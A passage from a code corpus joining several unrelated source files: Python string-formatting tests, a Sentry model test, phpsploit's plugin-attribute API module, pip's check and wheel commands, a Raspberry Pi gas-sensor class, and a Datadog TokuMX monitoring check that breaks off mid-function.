testboth("%34d", big, " 123456789012345678901234567890")
testboth("%.2d", big, "123456789012345678901234567890")
testboth("%.30d", big, "123456789012345678901234567890")
testboth("%.31d", big, "0123456789012345678901234567890")
testboth("%32.31d", big, " 0123456789012345678901234567890")
big = 0x1234567890abcdef12345L # 21 hex digits
testboth("%x", big, "1234567890abcdef12345")
testboth("%x", -big, "-1234567890abcdef12345")
testboth("%5x", -big, "-1234567890abcdef12345")
testboth("%22x", -big, "-1234567890abcdef12345")
testboth("%23x", -big, " -1234567890abcdef12345")
testboth("%-23x", -big, "-1234567890abcdef12345 ")
testboth("%023x", -big, "-01234567890abcdef12345")
testboth("%-023x", -big, "-1234567890abcdef12345 ")
testboth("%025x", -big, "-0001234567890abcdef12345")
testboth("%025x", big, "00001234567890abcdef12345")
testboth("%0+25x", big, "+0001234567890abcdef12345")
testboth("%+25x", big, " +1234567890abcdef12345")
testboth("%25x", big, " 1234567890abcdef12345")
testboth("%.2x", big, "1234567890abcdef12345")
testboth("%.21x", big, "1234567890abcdef12345")
testboth("%.22x", big, "01234567890abcdef12345")
testboth("%23.22x", big, " 01234567890abcdef12345")
testboth("%-23.22x", big, "01234567890abcdef12345 ")
testboth("%X", big, "1234567890ABCDEF12345")
testboth("%#X", big, "0X1234567890ABCDEF12345")
testboth("%#x", big, "0x1234567890abcdef12345")
testboth("%#x", -big, "-0x1234567890abcdef12345")
testboth("%#.23x", -big, "-0x001234567890abcdef12345")
testboth("%#+.23x", big, "+0x001234567890abcdef12345")
testboth("%# .23x", big, " 0x001234567890abcdef12345")
testboth("%#+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+26.23X", big, "+0X001234567890ABCDEF12345")
testboth("%#-+27.23X", big, "+0X001234567890ABCDEF12345 ")
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
# next one gets two leading zeroes from precision, and another from the
# 0 flag and the width
testboth("%#+027.23X", big, "+0X0001234567890ABCDEF12345")
# same, except no 0 flag
testboth("%#+27.23X", big, " +0X001234567890ABCDEF12345")
big = 012345670123456701234567012345670L # 32 octal digits
testboth("%o", big, "12345670123456701234567012345670")
testboth("%o", -big, "-12345670123456701234567012345670")
testboth("%5o", -big, "-12345670123456701234567012345670")
testboth("%33o", -big, "-12345670123456701234567012345670")
testboth("%34o", -big, " -12345670123456701234567012345670")
testboth("%-34o", -big, "-12345670123456701234567012345670 ")
testboth("%034o", -big, "-012345670123456701234567012345670")
testboth("%-034o", -big, "-12345670123456701234567012345670 ")
testboth("%036o", -big, "-00012345670123456701234567012345670")
testboth("%036o", big, "000012345670123456701234567012345670")
testboth("%0+36o", big, "+00012345670123456701234567012345670")
testboth("%+36o", big, " +12345670123456701234567012345670")
testboth("%36o", big, " 12345670123456701234567012345670")
testboth("%.2o", big, "12345670123456701234567012345670")
testboth("%.32o", big, "12345670123456701234567012345670")
testboth("%.33o", big, "012345670123456701234567012345670")
testboth("%34.33o", big, " 012345670123456701234567012345670")
testboth("%-34.33o", big, "012345670123456701234567012345670 ")
testboth("%o", big, "12345670123456701234567012345670")
testboth("%#o", big, "012345670123456701234567012345670")
testboth("%#o", -big, "-012345670123456701234567012345670")
testboth("%#.34o", -big, "-0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%# .34o", big, " 0012345670123456701234567012345670")
testboth("%#+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+.34o", big, "+0012345670123456701234567012345670")
testboth("%#-+37.34o", big, "+0012345670123456701234567012345670 ")
testboth("%#+37.34o", big, " +0012345670123456701234567012345670")
# next one gets one leading zero from precision
testboth("%.33o", big, "012345670123456701234567012345670")
# base marker shouldn't change that, since "0" is redundant
testboth("%#.33o", big, "012345670123456701234567012345670")
# but reduce precision, and base marker should add a zero
testboth("%#.32o", big, "012345670123456701234567012345670")
# one leading zero from precision, and another from "0" flag & width
testboth("%034.33o", big, "0012345670123456701234567012345670")
# base marker shouldn't change that
testboth("%0#34.33o", big, "0012345670123456701234567012345670")
# Some small ints, in both Python int and long flavors).
testboth("%d", 42, "42")
testboth("%d", -42, "-42")
testboth("%d", 42L, "42")
testboth("%d", -42L, "-42")
testboth("%#x", 1, "0x1")
testboth("%#x", 1L, "0x1")
testboth("%#X", 1, "0X1")
testboth("%#X", 1L, "0X1")
testboth("%#o", 1, "01")
testboth("%#o", 1L, "01")
testboth("%#o", 0, "0")
testboth("%#o", 0L, "0")
testboth("%o", 0, "0")
testboth("%o", 0L, "0")
testboth("%d", 0, "0")
testboth("%d", 0L, "0")
testboth("%#x", 0, "0x0")
testboth("%#x", 0L, "0x0")
testboth("%#X", 0, "0X0")
testboth("%#X", 0L, "0X0")
testboth("%x", 0x42, "42")
testboth("%x", -0x42, "-42")
testboth("%x", 0x42L, "42")
testboth("%x", -0x42L, "-42")
testboth("%o", 042, "42")
testboth("%o", -042, "-42")
testboth("%o", 042L, "42")
testboth("%o", -042L, "-42")
# Test exception for unknown format characters
if verbose:
print 'Testing exceptions'
def test_exc(formatstr, args, exception, excmsg):
try:
testformat(formatstr, args)
except exception, exc:
if str(exc) == excmsg:
if verbose:
print "yes"
else:
if verbose: print 'no'
print 'Unexpected ', exception, ':', repr(str(exc))
except:
if verbose: print 'no'
print 'Unexpected exception'
raise
else:
raise TestFailed, 'did not get expected exception: %s' % excmsg
test_exc('abc %a', 1, ValueError,
"unsupported format character 'a' (0x61) at index 5")
if have_unicode:
test_exc(unicode('abc %\u3000','raw-unicode-escape'), 1, ValueError,
"unsupported format character '?' (0x3000) at index 5")
test_exc('%d', '1', TypeError, "int argument required")
test_exc('%g', '1', TypeError, "float argument required")
test_exc('no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc('no format', u'1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', '1', TypeError,
"not all arguments converted during string formatting")
test_exc(u'no format', u'1', TypeError,
"not all arguments converted during string formatting")
class Foobar(long):
def __oct__(self):
# Returning a non-string should not blow up.
return self + 1
test_exc('%o', Foobar(), TypeError,
"expected string or Unicode object, long found")
if sys.maxint == 2**31-1:
# crashes 2.2.1 and earlier:
try:
"%*d"%(sys.maxint, -127)
except MemoryError:
pass
else:
raise TestFailed, '"%*d"%(sys.maxint, -127) should fail'
| gpl-2.0 |
BuildingLink/sentry | tests/sentry/models/test_project.py | 8 | 1099 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sentry.models import OrganizationMember, OrganizationMemberTeam
from sentry.testutils import TestCase
class ProjectTest(TestCase):
def test_member_set_simple(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
member = OrganizationMember.objects.get(
user=user,
organization=org,
)
OrganizationMemberTeam.objects.create(
organizationmember=member,
team=team,
)
assert list(project.member_set.all()) == [member]
def test_inactive_global_member(self):
user = self.create_user()
org = self.create_organization(owner=user)
team = self.create_team(organization=org)
project = self.create_project(team=team)
OrganizationMember.objects.get(
user=user,
organization=org,
)
assert list(project.member_set.all()) == []
| bsd-3-clause |
shiney-wh/phpsploit | src/api/plugin.py | 2 | 1672 | import re
from core import plugins
class Plugin:
"""Triggering plugin attributes.
Get attributes of the currently running plugin.
This object is generally imported like this:
>>> from api import plugin
    The following attribute descriptions include some
    examples, based on an imaginary plugin located at
    '/home/user/phpsploit/plugins/parent_dir/foobar/'.
ATTRIBUTES:
* name (type: str)
# Plugin name.
>>> plugin.name
'foobar'
* help (type: str)
# Plugin's docstring (detailed help).
>>> print(plugin.help)
[*] foobar: An imaginary phpsploit plugin
DESCRIPTION:
An imaginary foobar plugin description.
...
* path (type: str)
# Absolute path of plugin's root directory.
>>> plugin.path
'/home/user/phpsploit/plugins/parent_dir/foobar/'
* category (type: str)
# Plugin's category name (parent directory).
>>> plugin.category
'Parent Dir'
"""
def __init__(self):
pass
def __getattr__(self, attr):
errmsg = "type object '%s' has no attribute '%s'"
if attr in dir(self):
return getattr(plugins.current_plugin, attr)
raise AttributeError(errmsg % (self.__class__.__name__, str(attr)))
def __dir__(self):
result = []
for attr in dir(plugins.current_plugin):
obj = getattr(plugins.current_plugin, attr)
if re.match("^[a-z]+$", attr) and not callable(obj):
result.append(attr)
return result
# instantiate plugin object (for use within python API)
plugin = Plugin()
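
# Illustrative usage sketch (attribute values taken from the docstring above;
# the exact dir() contents depend on the plugin that is currently running):
#   >>> from api import plugin
#   >>> plugin.name              # proxied to plugins.current_plugin.name
#   'foobar'
#   >>> dir(plugin)              # lowercase, non-callable attributes only
#   ['category', 'help', 'name', 'path']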
| gpl-3.0 |
cynngah/uofthacksIV | generate-jobs/lib/python2.7/site-packages/pip/commands/check.py | 336 | 1382 | import logging
from pip.basecommand import Command
from pip.operations.check import check_requirements
from pip.utils import get_installed_distributions
logger = logging.getLogger(__name__)
class CheckCommand(Command):
"""Verify installed packages have compatible dependencies."""
name = 'check'
usage = """
%prog [options]"""
summary = 'Verify installed packages have compatible dependencies.'
def run(self, options, args):
dists = get_installed_distributions(local_only=False, skip=())
missing_reqs_dict, incompatible_reqs_dict = check_requirements(dists)
for dist in dists:
key = '%s==%s' % (dist.project_name, dist.version)
for requirement in missing_reqs_dict.get(key, []):
logger.info(
"%s %s requires %s, which is not installed.",
dist.project_name, dist.version, requirement.project_name)
for requirement, actual in incompatible_reqs_dict.get(key, []):
logger.info(
"%s %s has requirement %s, but you have %s %s.",
dist.project_name, dist.version, requirement,
actual.project_name, actual.version)
if missing_reqs_dict or incompatible_reqs_dict:
return 1
else:
logger.info("No broken requirements found.")
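
        # Example output (illustrative project names), following the two
        # format strings used above:
        #   foo 1.0 requires bar, which is not installed.
        #   baz 2.0 has requirement qux>=1.0, but you have qux 0.9.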
| mit |
paran0ids0ul/infernal-twin | build/pip/build/lib.linux-i686-2.7/pip/commands/wheel.py | 239 | 7442 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import os
import warnings
from pip.basecommand import RequirementCommand
from pip.index import PackageFinder
from pip.exceptions import CommandError, PreviousBuildDirError
from pip.req import RequirementSet
from pip.utils import import_or_raise, normalize_path
from pip.utils.build import BuildDirectory
from pip.utils.deprecation import RemovedInPip8Warning
from pip.wheel import WheelCache, WheelBuilder
from pip import cmdoptions
DEFAULT_WHEEL_DIR = os.path.join(normalize_path(os.curdir), 'wheelhouse')
logger = logging.getLogger(__name__)
class WheelCommand(RequirementCommand):
"""
Build Wheel archives for your requirements and dependencies.
Wheel is a built-package format, and offers the advantage of not
recompiling your software during every install. For more details, see the
wheel docs: http://wheel.readthedocs.org/en/latest.
Requirements: setuptools>=0.8, and wheel.
'pip wheel' uses the bdist_wheel setuptools extension from the wheel
package to build individual wheels.
"""
name = 'wheel'
usage = """
%prog [options] <requirement specifier> ...
%prog [options] -r <requirements file> ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Build wheels from your requirements.'
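
    # Example invocations (derived from the usage string above; paths and
    # package names are illustrative):
    #   pip wheel -r requirements.txt --wheel-dir ./wheelhouse
    #   pip wheel --no-deps some-package==1.0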
def __init__(self, *args, **kw):
super(WheelCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-w', '--wheel-dir',
dest='wheel_dir',
metavar='dir',
default=DEFAULT_WHEEL_DIR,
help=("Build wheels into <dir>, where the default is "
"'<cwd>/wheelhouse'."),
)
cmd_opts.add_option(cmdoptions.use_wheel())
cmd_opts.add_option(cmdoptions.no_use_wheel())
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(
'--build-option',
dest='build_options',
metavar='options',
action='append',
help="Extra arguments to be supplied to 'setup.py bdist_wheel'.")
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.download_cache())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(
'--global-option',
dest='global_options',
action='append',
metavar='options',
help="Extra global options to be supplied to the setup.py "
"call before the 'bdist_wheel' command.")
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(cmdoptions.no_clean())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def check_required_packages(self):
import_or_raise(
'wheel.bdist_wheel',
CommandError,
"'pip wheel' requires the 'wheel' package. To fix this, run: "
"pip install wheel"
)
pkg_resources = import_or_raise(
'pkg_resources',
CommandError,
"'pip wheel' requires setuptools >= 0.8 for dist-info support."
" To fix this, run: pip install --upgrade setuptools"
)
if not hasattr(pkg_resources, 'DistInfoDistribution'):
raise CommandError(
"'pip wheel' requires setuptools >= 0.8 for dist-info "
"support. To fix this, run: pip install --upgrade "
"setuptools"
)
def run(self, options, args):
self.check_required_packages()
cmdoptions.resolve_wheel_no_use_binary(options)
cmdoptions.check_install_build_global(options)
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.info('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
if options.download_cache:
warnings.warn(
"--download-cache has been deprecated and will be removed in "
"the future. Pip now automatically uses and configures its "
"cache.",
RemovedInPip8Warning,
)
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
with self._build_session(options) as session:
finder = PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
allow_external=options.allow_external,
allow_unverified=options.allow_unverified,
allow_all_external=options.allow_all_external,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
with BuildDirectory(options.build_dir,
delete=build_delete) as build_dir:
requirement_set = RequirementSet(
build_dir=build_dir,
src_dir=options.src_dir,
download_dir=None,
ignore_dependencies=options.ignore_dependencies,
ignore_installed=True,
isolated=options.isolated_mode,
session=session,
wheel_cache=wheel_cache,
wheel_download_dir=options.wheel_dir
)
self.populate_requirement_set(
requirement_set, args, options, finder, session, self.name,
wheel_cache
)
if not requirement_set.has_requirements:
return
try:
# build wheels
wb = WheelBuilder(
requirement_set,
finder,
build_options=options.build_options or [],
global_options=options.global_options or [],
)
if not wb.build():
raise CommandError(
"Failed to build one or more wheels"
)
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
if not options.no_clean:
requirement_set.cleanup_files()
| gpl-3.0 |
aldarionsevero/datalogger-ROS-rasp | sensors/mq135_sensor.py | 1 | 1548 | # Copyright (c) 2015 "aldarionsevero Lucas Severo Alves
# <[email protected]>""
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from sensor import Sensor
import botbook_mcp3002 as mcp
class Mq135Sensor(Sensor):
"""docstring for Mq135Sensor"""
def __init__(self):
Sensor.__init__(self)
self.sense_pin1 = 0 # pin 7 rasp
        # note: float(1 / 1000) would be integer division under Python 2,
        # silently yielding a gain of 0.0; 1.0 / 1000 gives the intended 0.001
        self.gain = 1.0 / 1000
self.gain_plus = 0
self.gaslevel = 0
def read_sensor(self):
self.gaslevel = mcp.readAnalog()
return self.gaslevel
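
    # Illustrative usage sketch (assumes the MCP3002 wiring noted above):
    #   sensor = Mq135Sensor()
    #   level = sensor.read_sensor()   # raw ADC reading via botbook_mcp3002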
| mit |
cberry777/dd-agent | checks.d/tokumx.py | 5 | 18952 | # (C) Datadog, Inc. 2014-2016
# (C) Leif Walsh <[email protected]> 2014
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
import time
import types
# 3p
import bson
from pymongo import (
MongoClient,
ReadPreference,
uri_parser,
version as py_version,
)
# project
from checks import AgentCheck
DEFAULT_TIMEOUT = 10
class LocalRate:
"""To be used for metrics that should be sent as rates but that we want to send as histograms"""
def __init__(self, agent_check, metric_name, tags):
self.agent_check = agent_check
self.metric_name = metric_name
self.tags = tags
self.prev_val = None
self.cur_val = None
self.prev_ts = None
self.cur_ts = None
def submit_histogram(self):
value = float(self.cur_val - self.prev_val)/float(self.cur_ts - self.prev_ts)
self.agent_check.histogram(self.metric_name, value=value, tags=self.tags)
def submit(self, val):
if self.prev_val is None:
self.prev_val = val
self.prev_ts = time.time()
elif self.cur_val is None:
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
else:
self.prev_val = self.cur_val
self.prev_ts = self.cur_ts
self.cur_val = val
self.cur_ts = time.time()
self.submit_histogram()
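
# Illustrative usage sketch (metric name and tags are hypothetical): the
# first submit() only primes prev_val/prev_ts; each later call submits
# (new_value - previous_value) / elapsed_seconds as a histogram point.
#   rate = LocalRate(check, 'tokumx.example.ops', tags=['env:demo'])
#   rate.submit(100)    # primes the local rate, nothing is submitted yet
#   rate.submit(160)    # histograms (160 - 100) / elapsed_seconds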
class TokuMX(AgentCheck):
SERVICE_CHECK_NAME = 'tokumx.can_connect'
GAUGES = [
"indexCounters.btree.missRatio",
"globalLock.ratio",
"connections.current",
"connections.available",
"mem.resident",
"mem.virtual",
"mem.mapped",
"cursors.totalOpen",
"cursors.timedOut",
"uptime",
"stats.indexes",
"stats.indexSize",
"stats.objects",
"stats.dataSize",
"stats.storageSize",
"replSet.health",
"replSet.state",
"replSet.replicationLag",
"metrics.repl.buffer.count",
"metrics.repl.buffer.maxSizeBytes",
"metrics.repl.buffer.sizeBytes",
"ft.cachetable.size.current",
"ft.cachetable.size.writing",
"ft.cachetable.size.limit",
"ft.locktree.size.current",
"ft.locktree.size.limit",
"ft.compressionRatio.leaf",
"ft.compressionRatio.nonleaf",
"ft.compressionRatio.overall",
"ft.checkpoint.lastComplete.time",
"ft.alerts.locktreeRequestsPending",
"ft.alerts.checkpointFailures",
]
RATES = [
"indexCounters.btree.accesses",
"indexCounters.btree.hits",
"indexCounters.btree.misses",
"opcounters.insert",
"opcounters.query",
"opcounters.update",
"opcounters.delete",
"opcounters.getmore",
"opcounters.command",
"opcountersRepl.insert",
"opcountersRepl.query",
"opcountersRepl.update",
"opcountersRepl.delete",
"opcountersRepl.getmore",
"opcountersRepl.command",
"asserts.regular",
"asserts.warning",
"asserts.msg",
"asserts.user",
"asserts.rollovers",
"metrics.document.deleted",
"metrics.document.inserted",
"metrics.document.returned",
"metrics.document.updated",
"metrics.getLastError.wtime.num",
"metrics.getLastError.wtime.totalMillis",
"metrics.getLastError.wtimeouts",
"metrics.operation.fastmod",
"metrics.operation.idhack",
"metrics.operation.scanAndOrder",
"metrics.queryExecutor.scanned",
"metrics.record.moves",
"metrics.repl.apply.batches.num",
"metrics.repl.apply.batches.totalMillis",
"metrics.repl.apply.ops",
"metrics.repl.network.bytes",
"metrics.repl.network.getmores.num",
"metrics.repl.network.getmores.totalMillis",
"metrics.repl.network.ops",
"metrics.repl.network.readersCreated",
"metrics.repl.oplog.insert.num",
"metrics.repl.oplog.insert.totalMillis",
"metrics.repl.oplog.insertBytes",
"metrics.ttl.deletedDocuments",
"metrics.ttl.passes",
"ft.fsync.count",
"ft.fsync.time",
"ft.log.count",
"ft.log.time",
"ft.log.bytes",
"ft.cachetable.miss.count",
"ft.cachetable.miss.time",
"ft.cachetable.miss.full.count",
"ft.cachetable.miss.full.time",
"ft.cachetable.miss.partial.count",
"ft.cachetable.miss.partial.time",
"ft.cachetable.evictions.partial.nonleaf.clean.count",
"ft.cachetable.evictions.partial.nonleaf.clean.bytes",
"ft.cachetable.evictions.partial.leaf.clean.count",
"ft.cachetable.evictions.partial.leaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.clean.count",
"ft.cachetable.evictions.full.nonleaf.clean.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.count",
"ft.cachetable.evictions.full.nonleaf.dirty.bytes",
"ft.cachetable.evictions.full.nonleaf.dirty.time",
"ft.cachetable.evictions.full.leaf.clean.count",
"ft.cachetable.evictions.full.leaf.clean.bytes",
"ft.cachetable.evictions.full.leaf.dirty.count",
"ft.cachetable.evictions.full.leaf.dirty.bytes",
"ft.cachetable.evictions.full.leaf.dirty.time",
"ft.checkpoint.count",
"ft.checkpoint.time",
"ft.checkpoint.begin.time",
"ft.checkpoint.write.nonleaf.count",
"ft.checkpoint.write.nonleaf.time",
"ft.checkpoint.write.nonleaf.bytes.uncompressed",
"ft.checkpoint.write.nonleaf.bytes.compressed",
"ft.checkpoint.write.leaf.count",
"ft.checkpoint.write.leaf.time",
"ft.checkpoint.write.leaf.bytes.uncompressed",
"ft.checkpoint.write.leaf.bytes.compressed",
"ft.serializeTime.nonleaf.serialize",
"ft.serializeTime.nonleaf.compress",
"ft.serializeTime.nonleaf.decompress",
"ft.serializeTime.nonleaf.deserialize",
"ft.serializeTime.leaf.serialize",
"ft.serializeTime.leaf.compress",
"ft.serializeTime.leaf.decompress",
"ft.serializeTime.leaf.deserialize",
"ft.alerts.longWaitEvents.logBufferWait",
"ft.alerts.longWaitEvents.fsync.count",
"ft.alerts.longWaitEvents.fsync.time",
"ft.alerts.longWaitEvents.cachePressure.count",
"ft.alerts.longWaitEvents.cachePressure.time",
"ft.alerts.longWaitEvents.checkpointBegin.count",
"ft.alerts.longWaitEvents.checkpointBegin.time",
"ft.alerts.longWaitEvents.locktreeWait.count",
"ft.alerts.longWaitEvents.locktreeWait.time",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.count",
"ft.alerts.longWaitEvents.locktreeWaitEscalation.time",
]
METRICS = GAUGES + RATES
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self._last_state_by_server = {}
self.idx_rates = {}
def get_library_versions(self):
return {"pymongo": py_version}
def check_last_state(self, state, server, agentConfig):
if self._last_state_by_server.get(server, -1) != state:
self._last_state_by_server[server] = state
return self.create_event(state, server, agentConfig)
def create_event(self, state, server, agentConfig):
"""Create an event with a message describing the replication
state of a mongo node"""
def get_state_description(state):
if state == 0:
return 'Starting Up'
elif state == 1:
return 'Primary'
elif state == 2:
return 'Secondary'
elif state == 3:
return 'Recovering'
elif state == 4:
return 'Fatal'
elif state == 5:
return 'Starting up (initial sync)'
elif state == 6:
return 'Unknown'
elif state == 7:
return 'Arbiter'
elif state == 8:
return 'Down'
elif state == 9:
return 'Rollback'
status = get_state_description(state)
msg_title = "%s is %s" % (server, status)
msg = "TokuMX %s just reported as %s" % (server, status)
self.event({
'timestamp': int(time.time()),
'event_type': 'tokumx',
'msg_title': msg_title,
'msg_text': msg,
'host': self.hostname
})
def _get_ssl_params(self, instance):
ssl_params = {
'ssl': instance.get('ssl', None),
'ssl_keyfile': instance.get('ssl_keyfile', None),
'ssl_certfile': instance.get('ssl_certfile', None),
'ssl_cert_reqs': instance.get('ssl_cert_reqs', None),
'ssl_ca_certs': instance.get('ssl_ca_certs', None)
}
for key, param in ssl_params.items():
if param is None:
del ssl_params[key]
return ssl_params
def _get_connection(self, instance, read_preference=None):
if 'server' not in instance:
raise Exception("Missing 'server' in tokumx config")
server = instance['server']
ssl_params = self._get_ssl_params(instance)
tags = instance.get('tags', [])
tags.append('server:%s' % server)
# de-dupe tags to avoid a memory leak
tags = list(set(tags))
        # Configured via a URL of the form mongodb://user:pass@server/db
parsed = uri_parser.parse_uri(server)
username = parsed.get('username')
password = parsed.get('password')
db_name = parsed.get('database')
if not db_name:
self.log.info('No TokuMX database found in URI. Defaulting to admin.')
db_name = 'admin'
service_check_tags = [
"db:%s" % db_name
]
nodelist = parsed.get('nodelist')
if nodelist:
host = nodelist[0][0]
port = nodelist[0][1]
service_check_tags = service_check_tags + [
"host:%s" % host,
"port:%s" % port
]
do_auth = True
if username is None or password is None:
self.log.debug("TokuMX: cannot extract username and password from config %s" % server)
do_auth = False
try:
if read_preference:
conn = MongoClient(server,
socketTimeoutMS=DEFAULT_TIMEOUT*1000,
read_preference=ReadPreference.SECONDARY,
**ssl_params)
else:
conn = MongoClient(server, socketTimeoutMS=DEFAULT_TIMEOUT*1000, **ssl_params)
db = conn[db_name]
except Exception:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags)
raise
if do_auth:
if not db.authenticate(username, password):
message = "TokuMX: cannot connect with config %s" % server
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags, message=message)
raise Exception(message)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK, tags=service_check_tags)
return server, conn, db, tags
def _get_replica_metrics(self, instance, conn, db, tags, server, status):
try:
data = {}
replSet = conn['admin'].command('replSetGetStatus')
if replSet:
primary = None
current = None
# find nodes: master and current node (ourself)
for member in replSet.get('members'):
if member.get('self'):
current = member
if int(member.get('state')) == 1:
primary = member
# If we have both we can compute a lag time
if current is not None and primary is not None:
lag = primary['optimeDate'] - current['optimeDate']
                    # Python 2.7 has this built in; Python < 2.7 doesn't...
                    if hasattr(lag, 'total_seconds'):
data['replicationLag'] = lag.total_seconds()
else:
data['replicationLag'] = (
lag.microseconds +
(lag.seconds + lag.days * 24 * 3600) * 10**6
) / 10.0**6
if current is not None:
data['health'] = current['health']
tags.append('replset:%s' % replSet['set'])
tags.append('replstate:%s' % current['stateStr'])
if current['stateStr'] == 'PRIMARY':
tags.append('role:primary')
else:
tags.append('role:secondary')
self.log.debug("Current replSet member is secondary. "
"Creating new connection to set read_preference to secondary.")
# need a new connection to deal with replica sets
server, conn, db, _ = self._get_connection(instance, read_preference=ReadPreference.SECONDARY)
data['state'] = replSet['myState']
self.check_last_state(data['state'], server, self.agentConfig)
status['replSet'] = data
except Exception as e:
if "OperationFailure" in repr(e) and "replSetGetStatus" in str(e):
pass
else:
raise e
return conn, db
def submit_idx_rate(self, metric_name, value, tags, key):
if key not in self.idx_rates:
local_rate = LocalRate(self, metric_name, tags)
self.idx_rates[key] = local_rate
else:
local_rate = self.idx_rates[key]
local_rate.submit(value)
def collect_mongos(self, server, conn, db, tags):
tags.append('role:mongos')
config = conn['config']
agg_result = config['chunks'].aggregate([{'$group': {'_id': {'ns': '$ns', 'shard': '$shard'}, 'count': {'$sum': 1}}}])
if agg_result['ok']:
for doc in agg_result['result']:
chunk_tags = list(tags)
parts = doc['_id']['ns'].split('.', 1)
chunk_tags.append('db:%s' % parts[0])
chunk_tags.append('coll:%s' % parts[1])
chunk_tags.append('shard:%s' % doc['_id']['shard'])
shard_doc = config['shards'].find_one(doc['_id']['shard'])
host_parts = shard_doc['host'].split('/', 1)
if len(host_parts) == 2:
chunk_tags.append('replset:%s' % host_parts[0])
self.gauge('tokumx.sharding.chunks', doc['count'], tags=chunk_tags)
def collect_metrics(self, instance, server, conn, db, tags):
status = db["$cmd"].find_one({"serverStatus": 1})
status['stats'] = db.command('dbstats')
# Handle replica data, if any
# See http://www.mongodb.org/display/DOCS/Replica+Set+Commands#ReplicaSetCommands-replSetGetStatus
conn, db = self._get_replica_metrics(instance, conn, db, tags, server, status)
for dbname in conn.database_names():
db_tags = list(tags)
db_tags.append('db:%s' % dbname)
db = conn[dbname]
stats = db.command('dbstats')
for m, v in stats.items():
if m in ['db', 'ok']:
continue
m = 'stats.db.%s' % m
m = self.normalize(m, 'tokumx')
# FIXME: here tokumx.stats.db.* are potentially unbounded
self.gauge(m, v, db_tags)
for collname in db.collection_names(False):
stats = db.command('collStats', collname)
for m, v in stats.items():
if m in ['db', 'ok']:
continue
if m == 'indexDetails':
for idx_stats in v:
for k in ['count', 'size', 'avgObjSize', 'storageSize']:
value = idx_stats[k]
if type(value) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.idx.%s' % k, idx_stats[k], tags=db_tags)
for k in ['queries', 'nscanned', 'nscannedObjects', 'inserts', 'deletes']:
key = (dbname, collname, idx_stats['name'], k)
self.submit_idx_rate('tokumx.statsd.idx.%s' % k, idx_stats[k], tags=db_tags, key=key)
# FIXME: here tokumx.stats.coll.* are potentially unbounded
elif type(v) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.coll.%s' % m, v, db_tags)
# If these keys exist, remove them for now as they cannot be serialized
try:
status['backgroundFlushing'].pop('last_finished')
except KeyError:
pass
try:
status.pop('localTime')
except KeyError:
pass
# Go through the metrics and save the values
for m in self.METRICS:
# each metric is of the form: x.y.z with z optional
# and can be found at status[x][y][z]
value = status
try:
for c in m.split("."):
value = value[c]
except KeyError:
continue
# value is now status[x][y][z]
if type(value) == bson.int64.Int64:
value = long(value)
else:
if type(value) not in (types.IntType, types.LongType, types.FloatType):
                    self.log.warning("Value found that is not of type int, int64, long, or float")
# Check if metric is a gauge or rate
if m in self.GAUGES:
